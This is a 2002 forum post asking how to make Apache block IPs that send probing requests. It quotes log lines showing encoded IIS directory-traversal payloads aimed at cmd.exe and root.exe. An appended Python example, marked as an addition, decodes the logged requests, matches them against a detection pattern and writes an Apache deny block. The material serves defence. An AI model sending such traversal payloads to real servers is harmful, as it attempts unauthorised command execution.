schiffler
07.08.02, 10:59
Is it also normal for you that at least 2 to 3 times per hour some script kiddies try to hack the server? What can be done about it?
Can I tell Apache to stop allowing an IP as soon as a certain request has come from it? E.g. when a request contains cmd.exe?
Here is an excerpt from the log files:
217.225.105.232 - - [07/Aug/2002:11:07:49 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:07:53 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:07:58 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:03 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:08 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:13 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:16 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:20 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:25 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:30 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:34 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:37 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:39 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:43 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:46 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:52 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
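As an added example (not part of the original post): a small Python scanner that reads access-log lines like the ones above, percent-decodes each request target until it is stable so that variants such as `%255c` and `%%35c` are recognised, and lists the clients that sent repeated probes. The function names, the `min_hits` threshold and the sample lines with documentation IPs are assumptions, and the generated block assumes Apache 2.4 `Require` syntax.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
# Indicators visible in the posted excerpt: IIS shell names and "../" or "..\" hops.
PROBE_RE = re.compile(r'(?:cmd|root)\.exe|\.\.[/\\]', re.IGNORECASE)

def fully_decode(target, max_rounds=5):
    """Percent-decode until stable, so %255c -> %5c -> backslash is seen."""
    for _ in range(max_rounds):
        decoded = unquote(target, encoding="latin-1")
        if decoded == target:
            break
        target = decoded
    return target

def probing_ips(lines, min_hits=3):
    """Return {ip: hits} for clients with at least min_hits probe requests."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and PROBE_RE.search(fully_decode(m.group(2))):
            hits[m.group(1)] += 1
    return {ip: n for ip, n in hits.items() if n >= min_hits}

def apache_deny_block(ips):
    """Render an Apache 2.4 access block (assumed version) denying the IPs."""
    rules = "".join(f"    Require not ip {ip}\n" for ip in sorted(ips))
    return "<RequireAll>\n    Require all granted\n" + rules + "</RequireAll>\n"

# Constructed sample lines (documentation IPs), modelled on the excerpt above.
SAMPLE = [
    '203.0.113.7 - - [07/Aug/2002:11:07:49 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"',
    '203.0.113.7 - - [07/Aug/2002:11:08:08 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"',
    '203.0.113.7 - - [07/Aug/2002:11:08:43 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"',
    '198.51.100.20 - - [07/Aug/2002:11:09:01 +0000] "GET /index.html HTTP/1.0" 200 1043 "-" "-"',
    '198.51.100.20 - - [07/Aug/2002:11:09:05 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"',
]

if __name__ == "__main__":
    print(apache_deny_block(probing_ips(SAMPLE)))
```

A `min_hits` above 1 keeps a client with a single matching request, like the second sample address, off the list.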